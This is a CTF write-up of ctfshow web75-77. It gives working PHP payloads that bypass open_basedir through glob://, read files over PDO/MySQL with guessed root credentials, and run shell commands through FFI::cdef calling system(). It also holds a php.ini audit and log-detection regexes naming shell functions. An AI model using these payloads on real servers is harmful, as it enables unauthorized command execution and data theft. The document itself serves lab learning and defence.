Ctfshow web getting started command execution web75-77
2022-06-26 11:23:00 【Make-1t-0r-d1e】
These days I have been working through the command-execution part of the ctfshow web introduction exercises and learned a lot of new tricks, so here I briefly record my understanding of the last few problems.
web75
Because of the open_basedir configuration restriction, the scandir function cannot be used to list directory contents. The glob:// wrapper can be used to bypass the open_basedir restriction, and the file flag36.txt was found in the root directory.
```php
c=$a=new DirectoryIterator("glob:///*");
foreach($a as $f){
    echo($f->__toString().' ');
}exit();
```

This challenge also uses include_path to restrict the paths a file can be included from, so include cannot be used directly to get the flag. I tried using a UAF to bypass the command-execution restriction, but because this challenge filters strlen, and although I tried rewriting the strlen function in several ways, none of them worked (if a later rewrite succeeds I will update this). So, following the hint, I used PDO to connect to MySQL and read the flag from the database; the payload is as follows.
```php
$dsn = "mysql:host=localhost;dbname=information_schema";
$db = new PDO($dsn, 'root', 'root');
$rs = $db->query("select database()");
foreach($rs as $row){
    echo($row[0])."|";
}exit();
```
The video walkthrough mentions that the database name ctftraining can be obtained, but when I tried connecting with AntSword to the loosely filtered challenge environment, logging in to mysql always produced a segmentation fault. Even without knowing the database name ctftraining, you can connect to the default database information_schema and still reach the goal of command execution; you only need to guess the mysql username and password.
Connecting to the default database information_schema and querying the database names shows that there is indeed a database named ctftraining.
```php
$dsn = "mysql:host=localhost;dbname=information_schema";
$db = new PDO($dsn, 'root', 'root');
$rs = $db->query("select group_concat(SCHEMA_NAME) from SCHEMATA");
foreach($rs as $row){
    echo($row[0])."|";
}exit();
```

Using the load_file function to read the flag file yields the flag.
web77
This challenge again uses the glob:// wrapper to bypass the open_basedir restriction and list all files in the root directory. Two suspicious files were found: flag36x.txt and readflag.
```php
c=$a=new DirectoryIterator("glob:///*");
foreach($a as $f){
    echo($f->__toString().' ');
}exit();
```

I tried the approach from web75 and 76, using PDO to connect to MySQL and then load_file to bypass the file-reading restriction and read the flag, but got a "could not find driver" error, which means PDO cannot be used to connect to the database in this challenge.
Looking at the writeup, this challenge uses the FFI (foreign function interface) feature of PHP 7.4+; see the PHP manual for the details. Here I mainly give a short analysis of the payload.
```php
$ffi = FFI::cdef("int system(const char *command);"); // declare the C system() prototype; with no $lib it is resolved from the process's global symbols
$a='/readflag > 1.txt'; // there is no echo, so the output is redirected into a file
$ffi->system($a); // call the C system() function through $ffi
```
The PHP manual gives the prototype of FFI::cdef as `public static FFI::cdef(string $code = "", ?string $lib = null)`, where $code is a string containing a sequence of regular C declarations and $lib is the name of the shared library file to load and link. If lib is omitted, platforms that support it will try to resolve the symbols declared in code in the global scope; other systems cannot resolve these symbols.
At first I thought the first line of the payload meant that, when no $lib is supplied, PHP's own system function would be called by default. In fact `int system(const char *command);` is the C-language declaration of the system function, which executes system commands, and on Linux `/readflag > 1.txt` is parsed and executed by the shell, so I guessed that readflag might be an executable.
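From the defender's side, the settings that decide whether the glob:// listing and the FFI call above work at all live in php.ini. The following Python audit is an added example, not part of this writeup or of the ctfshow challenge: it parses a constructed weak configuration (shaped the way the challenge must be for the payloads to succeed, with ffi.enable on in the web SAPI and DirectoryIterator reachable) beside a constructed hardened one, and reports the directives that let each technique through. The ini text, the `audit` helper and its finding labels are my own assumptions for the example, not the challenge's real configuration.

```python
import re

# Constructed sample: a weak php.ini shaped like the one the FFI payload
# needs (ffi.enable on in the web SAPI, DirectoryIterator not disabled).
WEAK_INI = """
[PHP]
; open_basedir alone does not stop DirectoryIterator("glob:///*")
open_basedir = /var/www/html
include_path = ".:/usr/share/php"
disable_functions = system,exec,shell_exec,passthru,popen,proc_open
disable_classes =
[ffi]
ffi.enable = true
"""

# Constructed hardened counterpart: FFI off for web requests, the iterator
# classes behind the glob:// listing disabled, dl() added to the block list.
HARDENED_INI = """
[PHP]
open_basedir = /var/www/html
include_path = ".:/usr/share/php"
disable_functions = system,exec,shell_exec,passthru,popen,proc_open,dl
disable_classes = DirectoryIterator,FilesystemIterator,GlobIterator
[ffi]
ffi.enable = false
"""

# PHP functions that spawn processes; any one left enabled is a direct
# route from code execution to command execution.
SHELL_FUNCS = ("system", "exec", "shell_exec", "passthru", "popen", "proc_open")


def parse_ini(text):
    """Parse php.ini-style text into {directive: value}.

    Section headers are skipped: PHP ignores them except for the special
    [PATH=] and [HOST=] forms, which this audit does not model.
    """
    settings = {}
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()  # drop ; comments
        if not line or line.startswith("[") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        settings[key.strip()] = value.strip().strip('"')
    return settings


def split_list(value):
    """Split a comma-separated directive value into a set of names."""
    return {item.strip() for item in value.split(",") if item.strip()}


def audit(ini_text):
    """Return (directive, reason) findings for the settings the writeup's
    techniques depend on. An empty list means none of them apply."""
    s = parse_ini(ini_text)
    findings = []

    # ffi.enable defaults to "preload", where FFI::cdef() is usable only from
    # the CLI or preloaded scripts. "true" makes it callable from any request.
    if s.get("ffi.enable", "preload").lower() in ("true", "on", "1"):
        findings.append(("ffi.enable", "FFI::cdef() reachable from web scripts; set to false"))

    # open_basedir fences file functions, but the writeup lists / through
    # DirectoryIterator("glob:///*") regardless, so the class itself is the
    # control that matters.
    if "DirectoryIterator" not in split_list(s.get("disable_classes", "")):
        findings.append(("disable_classes", "DirectoryIterator enabled; glob:// listing bypasses open_basedir"))

    enabled = [f for f in SHELL_FUNCS if f not in split_list(s.get("disable_functions", ""))]
    if enabled:
        findings.append(("disable_functions", "shell functions enabled: " + ",".join(enabled)))

    if not s.get("open_basedir"):
        findings.append(("open_basedir", "not set; no filesystem fence at all"))
    return findings


if __name__ == "__main__":
    for name, text in (("weak", WEAK_INI), ("hardened", HARDENED_INI)):
        print(name, audit(text) or "no findings")
```

Two points the audit encodes: ffi.enable defaults to preload, under which FFI::cdef() works only from the CLI or preloaded scripts, so a web SAPI that answers the payload above must have ffi.enable=true; and disable_classes can only be set in php.ini, so the DirectoryIterator block belongs in the image's configuration rather than in .htaccess or ini_set().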
- Use FFI to call the C `system` function to list the root directory:

```php
c=$ffi = FFI::cdef("int system(const char *command);");
$a='ls / > 1.txt';
$ffi->system($a);exit();
```

- Try to read /flag36x.txt directly; visiting 1.txt afterwards shows nothing:

```php
c=$ffi = FFI::cdef("int system(const char *command);");
$a='cat /flag36x.txt > 1.txt';
$ffi->system($a);exit();
```

- Try to read the /readflag file; it reads successfully and is an ELF executable:

```php
c=$ffi = FFI::cdef("int system(const char *command);");
$a='cat /readflag > 1.txt';
$ffi->system($a);exit();
```

- Guess that /flag36x.txt could not be read because of insufficient permissions. Listing the permission information of the root directory shows that this file has no read permission for other users, and the user executing the command is www-data, so cat cannot be used directly to read the file contents:

```php
c=$ffi = FFI::cdef("int system(const char *command);");
$a='ls -lst / > 1.txt';
$ffi->system($a);exit();
```

- Viewing the contents of the /readflag executable in IDA confirmed the guess above.

Executing the readflag file yields the flag.
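To close from the detection side, the three payload shapes in this writeup (DirectoryIterator over glob://, PDO plus load_file, and FFI::cdef reaching system) are distinctive enough to match in web server access logs. The Python below is an added example, not part of this writeup or of ctfshow: it decodes the `c` parameter of each request and labels the technique. The log lines are constructed for the example and carry the writeup's own payloads; `classify`, `scan`, the label names and the log format assumed (combined format without the referer and user-agent tail) are my own choices.

```python
import re
from urllib.parse import parse_qs, quote, urlsplit

# Detection patterns, one per technique in the writeup, applied to the
# URL-decoded value of the `c` parameter.
INDICATORS = [
    ("glob-dir-listing", re.compile(r"DirectoryIterator\s*\(\s*['\"]glob://", re.I)),
    ("pdo-load_file", re.compile(r"new\s+PDO\s*\(|load_file\s*\(", re.I)),
    ("ffi-system", re.compile(r"FFI::cdef\s*\(|\bsystem\s*\(", re.I)),
]

# Apache/nginx combined log format, minus the referer/user-agent tail.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def access_line(payload, ip="203.0.113.5", status=200):
    """Build a constructed access-log line carrying `payload` in c=."""
    encoded = quote(payload, safe="")
    return f'{ip} - - [26/Jun/2022:11:23:00 +0000] "GET /?c={encoded} HTTP/1.1" {status} 512'


# Constructed sample log: the writeup's three payloads, one benign c= value,
# and one request without c= at all.
SAMPLE_LOG = [
    access_line('$a=new DirectoryIterator("glob:///*");foreach($a as $f){echo($f->__toString()." ");}exit();'),
    access_line('$db=new PDO("mysql:host=localhost;dbname=information_schema","root","root");'
                '$rs=$db->query("select load_file(\'/flag36.txt\')");'),
    access_line('$ffi=FFI::cdef("int system(const char *command);");$a="ls / > 1.txt";$ffi->system($a);exit();'),
    access_line('echo "hello";'),
    '203.0.113.9 - - [26/Jun/2022:11:24:00 +0000] "GET /index.php HTTP/1.1" 200 128',
]


def classify(line):
    """Return a hit record for `line`, or None when it matches no indicator."""
    m = LOG_RE.match(line)
    if not m:
        return None
    params = parse_qs(urlsplit(m.group("target")).query)
    labels = {label
              for value in params.get("c", [])
              for label, rx in INDICATORS
              if rx.search(value)}
    if not labels:
        return None
    return {"ip": m.group("ip"), "ts": m.group("ts"),
            "status": int(m.group("status")), "labels": sorted(labels)}


def scan(lines):
    """Classify every line and keep the hits, in log order."""
    return [hit for hit in map(classify, lines) if hit]


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Matching on the decoded parameter rather than the raw request line matters: the payloads arrive percent-encoded, and a pattern written against the encoded form misses trivial variations in which characters the client chose to encode. The rules are deliberately narrow to the constructs this writeup uses; the `\bsystem\s*\(` alternative will also fire on ordinary PHP `system()` calls passed in a parameter, which for an eval-style endpoint like this one is exactly the traffic worth seeing.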